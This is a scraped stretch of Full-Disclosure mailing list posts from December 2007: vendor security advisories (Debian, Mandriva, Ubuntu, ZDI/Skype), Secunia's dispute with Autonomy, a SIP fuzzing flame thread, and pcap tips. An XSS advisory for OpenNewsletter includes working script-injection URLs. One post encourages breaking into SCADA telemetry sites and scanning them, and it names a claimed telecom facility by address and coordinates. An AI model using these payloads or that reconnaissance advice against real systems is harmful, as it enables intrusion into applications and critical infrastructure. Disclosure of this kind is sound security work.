Re: [Full-disclosure] pcap flow extraction
If you're OK with an intermediate step, you'll find a few tools out there (eg switch's YAF) that read pcap and spit out the flow data in netflow format. Then a second utility (eg flow-tools) can turn that into whatever format you'd like... John On Thu, Dec 06, 2007 at 06:35:42PM +1100, Ivan . wrote: Hi, Does anyone have any ideas for flow information extraction from a rather large pcap file, 6 gigs? I am after the standard stuff, source, destination, service. Ethereal/wireshark is a no go, as it won't process the file due to size, tcpflow is OK, but a little untidy. any suggestions are appreciated, preferably open source and also has anyone used tcpdstat for something like this? thanks Ivan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pcap flow extraction
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 yeah, we get this problem in win32 all the time - notepad drops it's knickers everytime it sees a large file and the OS almost locks up waiting for a response. To solve the problem I pre-process the file with scripts written in VBScript. You can easily write a script to skim off the first few kb of the file so you can work out the file format and then use that to parse out the entire file, only writing out the bit's you are interested in to a far smaller file. Alternatively, you can have your script write out all the data in a format that can be BCP'd into a DB that can handle big recordsets and then run SELECT statements as you like to get the data out. Cheers SR On Thu, 06 Dec 2007 07:35:42 + Ivan . [EMAIL PROTECTED] wrote: Hi, Does anyone have any ideas for flow information extraction from a rather large pcap file, 6 gigs? snip -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkdXrlcACgkQBGNKW24YMAfHKgP+NHbW8qhT3mtM7QjyNCAMX1PYLCGF aEfPAvx0Fa+JLGS2bDwzgnCulSgQNABHzVk7zPBteM+yp8LKl3SyiadabBYKm4dmwIze YtdcAsJn94JPkT6Ml8uJnB148lOru1RAgdWcP7Kdmx3oJLBRrxSYMmcyUwY9dStSQz1j zW9OG58= =YbLB -END PGP SIGNATURE- -- Get educated. Click here for Adult Education programs. http://tagline.hushmail.com/fc/Ioyw6h4eS1xh6WOPMnVv8VKZtrNsqBpZU6PQYAoUx0FOsJpzLnvaGk/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP Stack
I think you're missing his point. In fact I might be too but my take on it is this you'd think two PhD's and a PhD student might be able to do something a little more advanced than running a fuzzer and reporting DoS conditions. Well, in fact as part of our research we are working on smart techniques of how to fuzz. So, whenever we come up with something new, the first thing to do is to test it either if it works or not. Therefore, the vulnerabilities we had found. Do you guys even investigate the DoS to determine the root cause? If ye did then that might be OK and considered PhD level. I would think that a PhD level interpretation of this area might be for instance. running a fuzzer against a hardware phone and then getting some form of code execution. Yes? No? Maybe? We do not investigate the cause, as soon as we find a vulnerability we try to see if we can replay it and later send it to the appropriate company to allows them to fix it. As i told you before, the vulnerabilities found are just experimental results of our advances. It looks to me like someone one of you guys built a VoIP fuzzer (is it even a VoIP fuzzer or just SIP?) In fact, KiF can be split in two (in a very simplistic way). 1) A Generic Syntax Fuzzer able just to generate/parse messages. It takes a ABNF as input and it does the rest respecting or not the ABNF grammar. 2) A Statefull fuzzer able to keep track of the remote state machine and a local testing state machine. So, the first item can be useful for any non-flat ABNF grammar (e.g. TCP won't work). Usually those grammars can be found at the RFCs. So, different to most others fuzzers the extensibility and precision is easily achieve. In terms of the second item, it is totally dependent of SIP at the moment, mostly due to the need of Dialog and Transaction identification. However, we expect to generalize that in a middle term future. and for the remainder of your doctoral studies you will be purchasing equipment and hitting the 'Fuzz' button. As I said, if you're gonna be submitting this kind of stuff to every list you can then at least investigate the root cause, maybe then it'll provide some slightly more interesting reading and perhaps benefit your thesis. I already replied to it. Concerning to the comments from Reepex, i apologize for all these mails that you received from us, but thanks to this list we had plenty of good feedbacks from our work. As the purpose of the list is between others to disclose vulnerabilities, either we will have that permanent fights or simply you can ignore us. However, thanks for your comments of how to write better perl code (i can accepts comment of how to write better English as well :). Either ways, i will take a look on the perl advises before writing a new script. As Radu said earlier on, we are not expert on perl and personally not a big fan. The idea was just to show how to replay the problem. Humberto Abdelnur Phd student ;) nnp -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (Darwin) Comment: http://firegpg.tuxfamily.org iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7 addmL2c5Jm4LrlQvahnBrgY= =YX4u -END PGP SIGNATURE- On Dec 5, 2007 11:57 AM, [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: hi Reepex, I do not understand why are frustrated about a computer science degree. Maybe, someone got dropped out of a degree programm and some psychological trauma gets activated when seeing a Ph.D? If you like it or not, in order to get a computer science degree, you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you). If you will ever understand the contents, then you will understand what are our credentials..:) This will probably never happen. At least, I use a signature and a real name and do not hide behind a gmail account. Meanwhile try yourself to find at least one vulnerability and enjoy Perl programming, it seemes your computer science skills are somehow in this area :) Greetings RS Selon reepex [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]: So almighty Phd what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions' does this properly summarize your phd credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of' I am sure you will serve the academic community great one day when teach hacking classes revolving around the latest editions of hacking exposed On Dec 5, 2007
[Full-disclosure] [SECURITY] [DSA 1421-1] New wesnoth packages fix arbitrary file disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1421-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze December 6th, 2007 http://www.debian.org/security/faq - -- Package: wesnoth Vulnerability : directory traversal Problem type : remote Debian-specific: no CVE ID : CVE-2007-5742 A vulnerability has been discovered in Battle for Wesnoth that allows remote attackers to read arbitrary files the user running the client has access to on the machine running the game client. For the old stable distribution (sarge) this problem has been fixed in version 0.9.0-7. For the stable distribution (etch) this problem has been fixed in version 1.2-3. For the stable backports distribution (etch-backports) this problem has been fixed in version 1.2.8-1~bpo40+1. For the unstable distribution (sid) this problem has been fixed in version 1.2.8-1. For the experimental distribution this problem has been fixed in version 1.3.12-1. We recommend that you upgrade your wesnoth package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0-7.dsc Size/MD5 checksum: 850 7a32bba9f1bc498c9f18d7f0b4e8bcc5 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0-7.diff.gz Size/MD5 checksum:35737 e48f022ba672f368468bd0963777177d http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0.orig.tar.gz Size/MD5 checksum: 36051074 8dd59719631e0e6329a0a25e1dcbf302 Architecture independent components: http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-data_0.9.0-7_all.deb Size/MD5 checksum: 14743278 e5fa396da0eb9fedf05e80481cf3a121 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-ei_0.9.0-7_all.deb Size/MD5 checksum: 681980 39ba40eb63b14b756c8c847627ae070e http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-httt_0.9.0-7_all.deb Size/MD5 checksum: 4373916 9e71e1b72c91d74e743e5935bd8fcf6f http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-music_0.9.0-7_all.deb Size/MD5 checksum: 9936932 fe113db1873e90f3be255d52d9a64a93 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-sotbe_0.9.0-7_all.deb Size/MD5 checksum: 1844840 f3addc9fa6529f2e01074f3505042055 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-tdh_0.9.0-7_all.deb Size/MD5 checksum:66066 1324d16d02fd1e3c7f8daebba19846e7 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-trow_0.9.0-7_all.deb Size/MD5 checksum: 1717880 3ff81c9b863d6c7f74a96da7faab214b Alpha architecture: http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0-7_alpha.deb Size/MD5 checksum: 1901112 ecbcc158dd9c11092d3301fb5dd70976 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-editor_0.9.0-7_alpha.deb Size/MD5 checksum: 1518470 2e5466d1cdcee2e44dee0f1318c90b92 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-server_0.9.0-7_alpha.deb Size/MD5 checksum: 229504 161b50a0069154365d734d99be7fb2f9 AMD64 architecture: http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0-7_amd64.deb Size/MD5 checksum: 1521710 d867d3b826ab7ff3538b1a882fbd641f http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-editor_0.9.0-7_amd64.deb Size/MD5 checksum: 1210116 b72031667aa5538b05dfb6346e4c618a http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-server_0.9.0-7_amd64.deb Size/MD5 checksum: 197722 fc421baa70d0a903e2252fa384703efc ARM architecture: http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth_0.9.0-7_arm.deb Size/MD5 checksum: 2608206 023976bd45032204350012bdf078c1b1 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-editor_0.9.0-7_arm.deb Size/MD5 checksum: 2031774 d1c5f2a67b980e31ebabed6fabde5959 http://security.debian.org/pool/updates/main/w/wesnoth/wesnoth-server_0.9.0-7_arm.deb Size/MD5 checksum: 261158 41291940ea8a5fb2e8dced11e92b7b97 HP Precision architecture:
[Full-disclosure] [SECUNIA] Vendors still use the legal weapon
In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products. Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the Swiss Army Knife in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security. *First a little background information* The communication between Autonomy and their OEM customers regarding which versions of their KeyView software that fix given vulnerabilities has failed again and again. This has been a mess to sort out and Secunia has had to spent hours verifying what e.g. was fixed by IBM and what was fixed by Symantec - because apparently the versioning of the KeyView software is different whether used by Symantec, IBM, or others. We've managed to figure this out and occasionally this has caused one of Autonomy's OEM customers to have unpatched publicly known vulnerabilities in their products. All thanks to Autonomy's apparent inability to co-ordinate the release of new vulnerability fixes with their customers. Now, Autonomy has become fed up with handling all these vulnerabilities and believe that it is time to control what Secunia writes about. Autonomy wants Secunia to withhold information about the fact that vulnerability SA27835 in Keyview Lotus 1-2-3 File Viewer, which has been fixed by IBM, obviously also affects Autonomy's own versions 9.2 and 10.3 of KeyView. According to Autonomy, publishing an advisory would be misleading and cause confusion because the issues already have been fixed; in fact, they believe that this would cause the public to believe that there are more issues in their product than is the case! Now that is an interesting logic. Sorry Autonomy, writing an advisory that states which vulnerabilities have been fixed and in which versions is in no way misleading or confusing - even for historical issues. What is really interesting here is the fact that the Vulnerability Database services offered by Autonomy's own customers IBM and Symantec (ISS X-Force and Securityfocus respectively) still (at the time of publishing) don't show information about the fact that patches are available for the Lotus 1-2-3 issue - while Secunia, who Autonomy accuses of publishing misleading information, correctly reflects the fact that Autonomy offers patches. However, this doesn't seem to be a concern for Autonomy or perhaps their legal department also treats their own customers in the same way as Secunia is treated? What is misleading and confusing in this whole case is the apparent lack of co-ordination between Autonomy and Autonomy's OEM customers, the lack of clear, precise public statements about vulnerabilities and security fixes. If Autonomy wants to avoid misleading and confusing communication, then Autonomy ought to start publishing bulletins such as those made by most other serious and established software vendors (e.g. Microsoft and their own customers IBM and Symantec) with clear information about the type of vulnerability, potential attack vectors, potential impacts, affected versions, and unaffected versions - it's really that simple. Naturally, Autonomy should also communicate to their own customers (IBM and Symantec) that patches addressing vulnerabilities are available so that both their products and their Vulnerability Database services are updated. *Our response to these claims and accusations* Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: To provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general. Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret. It is truly sad to see that certain vendors like Autonomy still behave like many software vendors did back in the previous millennium. Kindest regards, Thomas Kristensen CTO, Secunia Copies of all correspondence in this matter is available below in chronological order, enjoy: http://secunia.com/gfx/Email%20from%20Secunia%2020071128.pdf http://secunia.com/gfx/Letter%20from%20Autonomy%2020071202.pdf http://secunia.com/gfx/Email%20from%20Secunia%2020071203.pdf http://secunia.com/gfx/Letter%20from%20Autonomy%2020071203.pdf
Re: [Full-disclosure] [SECUNIA] Vendors still use the legal weapon
I would have thought that by this time businesses would be more savvy to the entire vulnerability disclosure process. They don't seem to realize that in most cases its more damaging to try to quash research than it is to accept it with open arms. That is after all because quashing research is nearly synonymous with lying to customers. This reminds me of the HP v.s. SNOsoft fiasco back in 2001. Thomas Kristensen wrote: In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products. Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the Swiss Army Knife in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security. *First a little background information* The communication between Autonomy and their OEM customers regarding which versions of their KeyView software that fix given vulnerabilities has failed again and again. This has been a mess to sort out and Secunia has had to spent hours verifying what e.g. was fixed by IBM and what was fixed by Symantec - because apparently the versioning of the KeyView software is different whether used by Symantec, IBM, or others. We've managed to figure this out and occasionally this has caused one of Autonomy's OEM customers to have unpatched publicly known vulnerabilities in their products. All thanks to Autonomy's apparent inability to co-ordinate the release of new vulnerability fixes with their customers. Now, Autonomy has become fed up with handling all these vulnerabilities and believe that it is time to control what Secunia writes about. Autonomy wants Secunia to withhold information about the fact that vulnerability SA27835 in Keyview Lotus 1-2-3 File Viewer, which has been fixed by IBM, obviously also affects Autonomy's own versions 9.2 and 10.3 of KeyView. According to Autonomy, publishing an advisory would be misleading and cause confusion because the issues already have been fixed; in fact, they believe that this would cause the public to believe that there are more issues in their product than is the case! Now that is an interesting logic. Sorry Autonomy, writing an advisory that states which vulnerabilities have been fixed and in which versions is in no way misleading or confusing - even for historical issues. What is really interesting here is the fact that the Vulnerability Database services offered by Autonomy's own customers IBM and Symantec (ISS X-Force and Securityfocus respectively) still (at the time of publishing) don't show information about the fact that patches are available for the Lotus 1-2-3 issue - while Secunia, who Autonomy accuses of publishing misleading information, correctly reflects the fact that Autonomy offers patches. However, this doesn't seem to be a concern for Autonomy or perhaps their legal department also treats their own customers in the same way as Secunia is treated? What is misleading and confusing in this whole case is the apparent lack of co-ordination between Autonomy and Autonomy's OEM customers, the lack of clear, precise public statements about vulnerabilities and security fixes. If Autonomy wants to avoid misleading and confusing communication, then Autonomy ought to start publishing bulletins such as those made by most other serious and established software vendors (e.g. Microsoft and their own customers IBM and Symantec) with clear information about the type of vulnerability, potential attack vectors, potential impacts, affected versions, and unaffected versions - it's really that simple. Naturally, Autonomy should also communicate to their own customers (IBM and Symantec) that patches addressing vulnerabilities are available so that both their products and their Vulnerability Database services are updated. *Our response to these claims and accusations* Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: To provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general. Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret. It is truly sad to
[Full-disclosure] [ MDKSA-2007:238 ] - Updated liblcms package fixes buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:238 http://www.mandriva.com/security/ ___ Package : liblcms Date: December 6, 2007 Affected: Corporate 3.0, Corporate 4.0 ___ Problem Description: Stack-based buffer overflow in Little CMS (lcms) before 1.15 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ICC profile in a JPG file. Updated package fixes this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2741 ___ Updated Packages: Corporate 3.0: 67235f6fbaa2e362cc0c1d52649d18d3 corporate/3.0/i586/liblcms1-1.10-1.1.C30mdk.i586.rpm 805fa6864cf88a13b941ec4e413c71e0 corporate/3.0/i586/liblcms1-devel-1.10-1.1.C30mdk.i586.rpm 293cca953384a2f3bac3cc2ea65b1b55 corporate/3.0/SRPMS/liblcms-1.10-1.1.C30mdk.src.rpm Corporate 3.0/X86_64: 78a9e7f2ea86ff138e07237c3b5d5bbe corporate/3.0/x86_64/lib64lcms1-1.10-1.1.C30mdk.x86_64.rpm d5e8741839d23244b7cb357ef3cf8dbf corporate/3.0/x86_64/lib64lcms1-devel-1.10-1.1.C30mdk.x86_64.rpm 293cca953384a2f3bac3cc2ea65b1b55 corporate/3.0/SRPMS/liblcms-1.10-1.1.C30mdk.src.rpm Corporate 4.0: 005f43029851860076df0864ae5d corporate/4.0/i586/liblcms1-1.14-1.1.20060mlcs4.i586.rpm 9ddc51c13d7b905cc519b1e01923001d corporate/4.0/i586/liblcms1-devel-1.14-1.1.20060mlcs4.i586.rpm 2bea4f9e697ab0ff649e626f4d66681c corporate/4.0/SRPMS/liblcms-1.14-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 79be0e773bb6dd1736e5249801dedd36 corporate/4.0/x86_64/lib64lcms1-1.14-1.1.20060mlcs4.x86_64.rpm f4b498d695b67bdb99598c8d752c9176 corporate/4.0/x86_64/lib64lcms1-devel-1.14-1.1.20060mlcs4.x86_64.rpm 2bea4f9e697ab0ff649e626f4d66681c corporate/4.0/SRPMS/liblcms-1.14-1.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHWDdtmqjQ0CJFipgRAkFkAJ9Xi9oDeVwkzqZdNX9deNA5AJBJ8QCgwdKZ NpW/aR+9SgA2cLUt/jh9S/0= =hEgI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-554-1] teTeX and TeX Live vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 === Ubuntu Security Notice USN-554-1 December 06, 2007 tetex-bin, texlive-bin vulnerabilities CVE-2007-5935, CVE-2007-5936, CVE-2007-5937 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: tetex-bin 3.0-13ubuntu6.1 Ubuntu 6.10: tetex-bin 3.0-17ubuntu2.1 Ubuntu 7.04: tetex-bin 3.0-27ubuntu1.2 Ubuntu 7.10: texlive-extra-utils 2007-12ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Bastien Roucaries discovered that dvips as included in tetex-bin and texlive-bin did not properly perform bounds checking. If a user or automated system were tricked into processing a specially crafted dvi file, dvips could be made to crash and execute code as the user invoking the program. (CVE-2007-5935) Joachim Schrod discovered that the dviljk utilities created temporary files in an insecure way. Local users could exploit a race condition to create or overwrite files with the privileges of the user invoking the program. (CVE-2007-5936) Joachim Schrod discovered that the dviljk utilities did not perform bounds checking in many instances. If a user or automated system were tricked into processing a specially crafted dvi file, the dviljk utilities could be made to crash and execute code as the user invoking the program. (CVE-2007-5937) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1.diff.gz Size/MD5: 147737 15f1e02a156c82616483c5fe33e3c995 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1.dsc Size/MD5: 1059 48e1181f4ed2d925f5aa735cf4416ee4 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0.orig.tar.gz Size/MD5: 12749314 944a4641e79e61043fdaf8f38ecbb4b3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4-dev_3.0-13ubuntu6.1_amd64.deb Size/MD5:77196 7b98a751a64e10eaaacce4e590be2c8b http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4_3.0-13ubuntu6.1_amd64.deb Size/MD5:79390 60d5ba566b62b1f1779d3ad25d1c3dea http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1_amd64.deb Size/MD5: 3979524 0216c41db9188dc0b125674dfb5d474c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4-dev_3.0-13ubuntu6.1_i386.deb Size/MD5:68732 dca7cca4022cb7ef79a5309f1c893093 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4_3.0-13ubuntu6.1_i386.deb Size/MD5:75128 a01b92fc05dffaf6556eec1a1519b715 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1_i386.deb Size/MD5: 3392422 e8236dfa44c5e4cc5e0d3c356e79b0d3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4-dev_3.0-13ubuntu6.1_powerpc.deb Size/MD5:79680 55487a575962d99d0d19d62f5a0c68db http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4_3.0-13ubuntu6.1_powerpc.deb Size/MD5:80726 c91244b5b53a2003fdd3fec310122a17 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1_powerpc.deb Size/MD5: 3953686 e74ba9f82bab3938432d82e06d7d4dd6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4-dev_3.0-13ubuntu6.1_sparc.deb Size/MD5:75092 bae8d0d0d7c5f3cf0c01e1c51be52f65 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea4_3.0-13ubuntu6.1_sparc.deb Size/MD5:79094 6b98e992e86c4f1857f8e586aafcd7e3 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-13ubuntu6.1_sparc.deb Size/MD5: 3748932 dda472ccbd1d1f21719cd4332fbdf17b Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-17ubuntu2.1.diff.gz Size/MD5: 157517 fd0668b0eecf41d4bf853b68a8eccab5 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0-17ubuntu2.1.dsc Size/MD5: 1060 196ac952be9eeb717881c0cce6317515 http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_3.0.orig.tar.gz Size/MD5: 12749314 944a4641e79e61043fdaf8f38ecbb4b3 amd64 architecture (Athlon64, Opteron, EM64T Xeon):
Re: [Full-disclosure] High Value Target Selection
Really, how much trouble could we get in if we posted up a list of street addresses, each address being a building that contained significant telco and/or routing infrastructure? try it, it's amusing. remember the all the photogs getting hassled by the man for merely taking pictures of bridges and plants and such? if you're actually effective at amassing a good database of infrastructure information you'll get the attention you so desperately crave; i promise! Yes, but stuff such as the cryptome eyeball series http://www.eyeball-series.org exist, though I do not know what kind of problems or requests they have been subjected to. They mention stuff on there such as the (alleged?) Sprint NAP at 4101 Maple Avenue, Merchantville, NJ. Map co-ords 39°56'55.90N, 75° 3'56.72W for you google maps and google earth people. Or a quick photo link at http://cryptome.org/sprint-map-01.jpg Love that kind of thing. Who knows how accurate the intel is, however - it ought to be confirmed. It sure would be neat, but would it be useful, to then cross index it with routing and assorted information? Something sounds enticing about being able to easily pull up a list of locations, get a (literal) picture of them and then within seconds be poking around in their space. Clearly the info exists, such as software like http://www.maxmind.com/app/city. I haven't used nor do I know how accurate it is. Now if only folks like that got cracked and the data posted on usenet. And there's all kinds of visual traceroute tools, none of which I have ever been satisfied by. Some kind of free and open yet accurate, updated network image overlay for Google Earth would be nice. The data would be generated from different sources, ideally as many (useful) protocols as possible, customizable, etc. Press a button and various zones become coloured according some user definable logical and/or physical network characteristics. Starting to sound too theoretical now ;) At least the PLC, SCADA and related hacking is a nice concrete diversion. Time to sharpen up your lock picking skills and look for the little telemetry shacks in your area, such as by rivers and lakes, railway lines, etc. Pack a notebook with the appropriate tools (nmap, sniffers, etc) and start collecting info; fingerprint it, snmpwalk it, etc. Note makes and models, part numbers, etc. Grab frequency and modulation info for the RF stuff. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-07-070: Skype skype4com URI Handler Remote Heap Corruption Vulnerability
ZDI-07-070: Skype skype4com URI Handler Remote Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-070.html December 6, 2007 -- CVE ID: CVE-2007-5989 -- Affected Vendor: Skype -- Affected Products: Skype 3.6 GOLD -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5752. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Skype. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the 'skype4com' URI handler created by Skype during installation. When processing short string values through this handler an exploitable memory corruption may occur which can result in arbitrary code execution under the context of the current user. -- Vendor Response: Skype has corrected this issue as of 11/15/2007. All clients updated or installed as of that date are patched to this issue. -- Disclosure Timeline: 2007.11.02 - Vulnerability reported to vendor 2007.12.06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security Advisorie] OpenNewsletter v2.5 Multipe XSS Attacks
[#0001] Intrabytes Security Labs - Vulnerability report. ::: Software: OpenNewsletter Homepage: http://www.selfexile.com/projects/opennewsletter Affected version: v2.5 and below Overview: OpenNewsletter si a free, simple, and beautiful open source newsletter solution aimed at small-medium scale. Attack: A non-existant sanitization when parsing the PHP value 'type' on 'compose.php', leads to some XSS attacks. PoC: http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E Solution: not aware of at 12/6/2007, vendor has been warned about the vulnerability. Discovered by: Manuel Fernandez ([EMAIL PROTECTED]) Intrabytes - I+D Security Area http://www.intrabytes.com This message was sent using IMP, the Internet Messaging Program. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anyone have a reason for 2x the email flow today?
